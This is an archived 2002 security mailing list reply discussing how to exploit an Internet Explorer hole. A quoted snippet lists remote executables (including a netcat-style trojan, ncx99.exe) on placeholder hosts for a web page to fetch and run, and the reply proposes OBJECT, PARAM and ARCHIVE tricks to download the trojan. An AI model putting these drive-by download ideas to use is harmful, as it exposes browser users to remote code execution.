Vulnerability Development mailing list archives
Re: Rather large MSIE-hole
From: Joerg Over <over () dexia de>
Date: Fri, 15 Mar 2002 10:27:34 +0100
Hello ... What about, generally, not tackling the programName array trying to stuff params into it, but the <OBJECT> instead? At 17:48 14.03.02 -0500 you wrote: ->Another thought... will this bug run an executable from a web page? If ->so you could just make your own binary to do whatever you wanted. Like ->http://mysiteathome.com/malware.exe or something along those lines. I ->would HOPE that it asks to save the file to disk or even better ignore ->it all together. Maybe try something like: -> ->var programName=new Array( -> 'http://mysiteathome.com/ncx99.exe', -> 'http://someothersite.com/ncx99.exe', ->); One could maybe try the <PARAM NAME=> - tag to pass parameters. Dunno how that's transported to the object, though. Another attempt might be using the ARCHIVE - attribute of the OBJECT to download the trojan (or batchfile if you will, like has been proposed here), so you don't need params. greetings, -jo
Current thread:
- Re: Rather large MSIE-hole, (continued)
- Re: Rather large MSIE-hole Syzop (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Keegan (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Eric V Brown (Mar 14)
- RE: Rather large MSIE-hole Wall, Kevin (Mar 14)
- Re: Rather large MSIE-hole Paul D. Campbell (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- RE: Rather large MSIE-hole Chad Thunberg (Mar 15)
- Re: Rather large MSIE-hole Joerg Over (Mar 15)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole John Swensson (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole The Blueberry (Mar 14)
- RE: Rather large MSIE-hole Keith Tyler (Mar 15)
- Re: Rather large MSIE-hole Slow2Show (Mar 15)
- RE: Rather large MSIE-hole Tiago Halm (Mar 16)